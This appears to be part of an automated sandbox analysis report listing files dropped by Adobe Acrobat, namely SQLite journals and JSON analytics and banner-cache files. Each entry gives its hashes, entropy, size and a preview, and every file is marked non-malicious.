                                                                                                                                                                                                                                    SHA1:4221874EB8C0F47AB09F9F0F33CDB1DE1DD9AFDF
                                                                                                                                                                                                                                    SHA-256:6650425259FAFE27E876682184E17F9B75E0EDF6E52018A0C2186B34DCC992E2
                                                                                                                                                                                                                                    SHA-512:6093141A10F334733092BD9FA857D0D2C5A85D55BBC20790A5F1B953EE0705032B23AD6B2F04BD2FE3FDDF68C6BB64DDB6CC9EF3F0A2E090246C95E89337658B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):8720
                                                                                                                                                                                                                                    Entropy (8bit):3.7692821042097813
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:6103604CA9D9D7D4A3B2CAEF5CB80A28
                                                                                                                                                                                                                                    SHA1:1FAF9CEC39B1A9F6406F4B0099AAF197DA67C297
                                                                                                                                                                                                                                    SHA-256:293EA99849DDE016F8569A220F998C44358F1E63F47AE0F09DAE4FCFC64F04C5
                                                                                                                                                                                                                                    SHA-512:EFEFCE9DCC8A2122CCD9B3BE9CF71EA5568D52A9BE207C0E90CFD5A8E47E28EE46DB420488302AF36342B63C098976523895B83F32F26C38D067D79EA7F93636
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:.... .c......K."...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):295
                                                                                                                                                                                                                                    Entropy (8bit):5.369989947967036
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:A8E0EC2B0CF7AF96A9430690D4006886
                                                                                                                                                                                                                                    SHA1:3E84805D615E05C4D2D7831DAECB3686048D3521
                                                                                                                                                                                                                                    SHA-256:66F5374B95E77DC1B669125265A38C853BE132A472553936D5E45E08D67E4D08
                                                                                                                                                                                                                                    SHA-512:8A4E63F0786779B7C1944F36C37228513DBD7E3192978BFFA32EE45D23D54764D3F7657D941DEA1903138EF0585B2AF6CE2FDC8BBD9D7E48A03B7EEE7BC2FFBB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):294
                                                                                                                                                                                                                                    Entropy (8bit):5.31803247020199
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:39DA6FDFCA515DFFD34516895604255F
                                                                                                                                                                                                                                    SHA1:C96FE6CCEFEBE9EDAB704C4FD7F9EC1BA223A91C
                                                                                                                                                                                                                                    SHA-256:59C4332B24EC1EF6C85298419EA2902B8A8D54C2602F4876BF1F89DD2DA56239
                                                                                                                                                                                                                                    SHA-512:9CE9AFDE9618BB041A6A0733273820DE56FF5D8D2C870ACF5E15294A9B33FC40D84039ED440651C2E15E9CD09B75224CE4B4FA42F449311998546B8BDB5DBAB7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):294
                                                                                                                                                                                                                                    Entropy (8bit):5.296580786727995
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:8F846DDA66B9D5B3A9677714374223C7
                                                                                                                                                                                                                                    SHA1:01D464257C9F95A2ECD7C34E3D3B24413D4A8CAF
                                                                                                                                                                                                                                    SHA-256:7D93F886761135230E9211A5CC3DE7AD469C8F08BC8869F9CD11D25D1010C519
                                                                                                                                                                                                                                    SHA-512:51F8A9350A17E00EA2A03CE1BF9BAFE567115BC49AD3F0216DF200EAB30D16FE7AD5813DDA6CBBB45CC8A829774F68D9B1B4F903A783D0D071F7BF2227FB3FDD
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):285
                                                                                                                                                                                                                                    Entropy (8bit):5.356318942665622
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:AC264463E63344E95CDA7BACFDC4C2B5
                                                                                                                                                                                                                                    SHA1:80BDF2F30A3AD90C96610091FE79339401CCAD3C
                                                                                                                                                                                                                                    SHA-256:E9EF0C0E4D465C7CA2B19B484C1444FB03CCBC281F75220B93971CEE058D8A89
                                                                                                                                                                                                                                    SHA-512:794A28B511EE93723889A15C68769FB8A3457D8C8CFB6C5D6102B91D72DD07BB76D17A6D506209103FB0C30548609853AF7FB180583F9AC9F5B2D9973E21B51D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2129
                                                                                                                                                                                                                                    Entropy (8bit):5.840030040870772
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:3F082CFBFA504AD29DD2F9BB81501DE0
                                                                                                                                                                                                                                    SHA1:F70EA4DAADFD9B002E2986FCCEE62942F557734E
                                                                                                                                                                                                                                    SHA-256:B60FA0EB59C647054018CB3F33790879A7D4F99A5786DCAC8472A72B815F8D7B
                                                                                                                                                                                                                                    SHA-512:F2FBE9BBED5773316BD24C36FD06D5A3AA736EA84964414F39A71241F0C76EC60FE20100655E998B5512A376A44C843DD87797C8D23BCE3D8BB2D68344AAB8DE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_1","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"5a9d1955-ab74-4b89-837a-074b702313c0","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2NvbnZlcnQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRXhwb3J0IFBERnMgdG8gTWljcm9zb2Z0IFdvcmQgYW5kIEV4Y2VsLiIsImN0YUxhYmVsIjpudWxsLCJjdGFCZWhhdmlvciI6bnVsbCwiY3RhVXJsIjpudWxsLCJjdGFVcmxUeXBlIjpudWxsLC
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):289
                                                                                                                                                                                                                                    Entropy (8bit):5.304320152590986
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:A4D6254D2604B9CA794E38B5F9A428CA
                                                                                                                                                                                                                                    SHA1:496476E4C8997924EA99FB49651E6FE6530CAAB4
                                                                                                                                                                                                                                    SHA-256:ACA2BA1A13028250CA1FF5E94CBD6887AEA9FD608E6A34D2AAD750BFF4661230
                                                                                                                                                                                                                                    SHA-512:B388CD839119FFBAC25FC8960BA092A00F24B9393F1BA4C8ADAD2DD6DEB2456A7EDF6F69CC8AEF17DE904F35ACCBCF3B3530EDF669D73C48034F649987E409AE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):292
                                                                                                                                                                                                                                    Entropy (8bit):5.305814593003555
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:7997912D74B14A69507CECDBB9DD903C
                                                                                                                                                                                                                                    SHA1:A9AC34A4394631C7B889E8A7E44BA065B148AE70
                                                                                                                                                                                                                                    SHA-256:95FE97D188EC5623F3B032475109B6187924267CF4A1C55D944D0DB6A625D2D2
                                                                                                                                                                                                                                    SHA-512:EDA5D5F05FB1E92055273E0B9434884CC5C04FBA411B697584AB3A7C64AD5F53E4747F4D255DDBAF9E6C5312CF8297D58907D9A89F67EE696CA224AAB2533C20
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2080
                                                                                                                                                                                                                                    Entropy (8bit):5.824981108433509
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:C7E784D803A4BC4E87E3A38029DF4BA1
                                                                                                                                                                                                                                    SHA1:35BCC0FE3729B10CF117B7D13B5BF9DF9F517224
                                                                                                                                                                                                                                    SHA-256:3FD8F9C95F70FE77018CED1D9F0DA4CEDED8DEC9B4A23E28A4A7BA6C0B7786D5
                                                                                                                                                                                                                                    SHA-512:F3206A807E81F6FF2CCA99243C62B12F644C6DC6D50C9C16C6759EAA73C8D9415473A9EAF7F41C7D9CDF182A6C27A9CC37A4F225640B5DB828299C7252D54012
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_2","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"164bf29d-ee04-491c-adf2-c0bfeedb2d1b","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2VkaXQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjpudWxsLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGFkYXRhIjp7InN0cmluZ01ldGFkYXRhIjp
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):295
                                                                                                                                                                                                                                    Entropy (8bit):5.329834993169593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:53C5A06BC53FA5DD34B45055E33244D8
                                                                                                                                                                                                                                    SHA1:3008B552844E00906F673EF38FC84512E244BDB7
                                                                                                                                                                                                                                    SHA-256:D30378CD15C4BB6CEBF94A1F3D18E2F076A59BD3197FE66E3421F75E1AA6CB48
                                                                                                                                                                                                                                    SHA-512:B78E2BDA3B60D2AA8BA7FEBF419DAC5EC8381E324FF20892FBB313943B5369DDC1C751AEB779A3F46B35C1C75C73EF3DAF35D29FB421CE824833F28E6E649C8B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):289
                                                                                                                                                                                                                                    Entropy (8bit):5.311236471760302
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:DEDBF25247E19A1DDBFEBCD186778FB9
                                                                                                                                                                                                                                    SHA1:6E0D9E807CD008FA2E749BC3450B46A71333CB90
                                                                                                                                                                                                                                    SHA-256:3DEC7785C75B83287033795C760124C9E12B32823E945DF6646E7FD7D44B8B97
                                                                                                                                                                                                                                    SHA-512:FB39A60050B4B94AE62A804B902A96C325838DA4EAF79E99B71E9B2B77DA0FD1EAEC7ECD55D6F53223BBF1FE682B87D814372E2886F20FCDA7B6566DE59A3E72
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):284
                                                                                                                                                                                                                                    Entropy (8bit):5.297783660717864
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:EDF53E1980E010CF9B689C995FEAE30D
                                                                                                                                                                                                                                    SHA1:57B139D1E018193BFAF518720ABF99793238F5E4
                                                                                                                                                                                                                                    SHA-256:B002D6AE90DA3F0E598EA7C3592AA385841EA9BCBC1C2A1C7556A0C4B261D546
                                                                                                                                                                                                                                    SHA-512:FEE4C10E050D0287358CBF94386A736F88220AAE543168B61901FD9A20303AE41A43D8B625A8EEFD61160B8918A466416CEDD453AEA9776D7DE309BDEDE243DE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):291
                                                                                                                                                                                                                                    Entropy (8bit):5.294706342824129
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:84BEF673F4B173AFF454B81CFCA2756A
                                                                                                                                                                                                                                    SHA1:9F589A78D109E41CEABC2256ED9F139C7CB2FEAB
                                                                                                                                                                                                                                    SHA-256:F8F90D8FCF5B722FF1D802553379CCD6A677C9BBF9462334B514FA4DE9F63DAD
                                                                                                                                                                                                                                    SHA-512:7CD452C86041BFA0D44B65CFC6A1577D9C9B9D7C94FE05C59398BD159B0976FD4ECF31A66113AA9AC27B7D9A82F31098B45D4925EFEC68CC8B28720BB911BD31
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):287
                                                                                                                                                                                                                                    Entropy (8bit):5.297110368409965
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:2532774F41C1A2A68298BF3E510C7282
                                                                                                                                                                                                                                    SHA1:1AF3ACACFFA35849B4F243003600ADBA72F7EE25
                                                                                                                                                                                                                                    SHA-256:6DDF2F1B96603F9B44035BE12EB1B29CAAFFE60FFA4311C8EFFBD8723CCD720E
                                                                                                                                                                                                                                    SHA-512:01EE0A16971222051C8EB2C68627B99292E0D94003D909C651B2CADE02C8DF44FB5496949F271E92F6A3312E57108E8C1E5EBD4D82A38B69E01E8FD5C0591306
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2028
                                                                                                                                                                                                                                    Entropy (8bit):5.839283619884453
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:F9238D3C4AB75388934780D3A340F604
                                                                                                                                                                                                                                    SHA1:A1F1B215086B4EED3920ED07D37E21108117E147
                                                                                                                                                                                                                                    SHA-256:315B7597C73DD275E15AEB54BF78E6B4641C48FE3AC665AB27352A04063A44C2
                                                                                                                                                                                                                                    SHA-512:770DCA71B95E572323EEEE2A44DA75058A13B4EE696BB29CE74968860D35975731F658E3BF13553433963A0EDCAD33EEB0D2291BB55C6016A48C4CC3664C90D9
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_0","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"339c0ba6-2e61-4622-82f6-f07787d206b8","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL3NpZ24iLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRWFzaWx5IGZpbGwgYW5kIHNpZ24gUERGcy4iLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGF
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):286
                                                                                                                                                                                                                                    Entropy (8bit):5.2722055863831105
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:DD0F3F23EF7D24C9216D2951AB7749DF
                                                                                                                                                                                                                                    SHA1:79EF8CD0D6ACE129E58BCF66BA590CB4DB304D72
                                                                                                                                                                                                                                    SHA-256:D17974FB16DC7E257D28707366A4CFCEBB4E39E3D3FEFB69CB20705B1C1A97C9
                                                                                                                                                                                                                                    SHA-512:573ABC6DE124E1C6B7C3A17434301836DE067EFA8B667087F4BD1CA810D979FEB0EC207E17F4980BA0BBE24F74E705C632381EB8297A9BCFC4A1E7DD40BBF492
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):282
                                                                                                                                                                                                                                    Entropy (8bit):5.281604698107247
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:3493C2D4C89A65FF065A936A14D3004A
                                                                                                                                                                                                                                    SHA1:348135CABAFFE2CE1AE0DB40E5239BD52C815FBA
                                                                                                                                                                                                                                    SHA-256:1B1AA296642BDF95844C219E6E96BA51A5CBFFC08065BCE9EDB9807B39C7B063
                                                                                                                                                                                                                                    SHA-512:D7D72491C23D7C596D5D5B2AF73B05C066E238481D736EB2F5DC48D0A4B0B6F8BD601C3296FF36EB7A97B2AAC6078E86E74014D94536884F2A7D68F9A3305368
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"analyticsData":{"responseGUID":"c3ae61eb-8a30-46db-9a69-5d1605cb526a","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1743087439244,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                                                                                    Entropy (8bit):0.8112781244591328
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                                                                                                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                                                                                                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                                                                                                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:....
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2815
                                                                                                                                                                                                                                    Entropy (8bit):5.13658585374263
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:CA927E1F833F7F4FDF1F54E4AD2DD753
                                                                                                                                                                                                                                    SHA1:F988F18341C5658545765EBA795981226CF66FF5
                                                                                                                                                                                                                                    SHA-256:23735CBB940912A53C211F496821711F0BD377AD2AEECE914DDE4855FA6DA8AF
                                                                                                                                                                                                                                    SHA-512:863F4F084825FA383F6149DF3A140925FA7F5A245F6D2BC2C78DE1E10DFA72FB3B857722E073EC80C3541E630BBCC325FCF67594CD761AC61ED71158C459841B
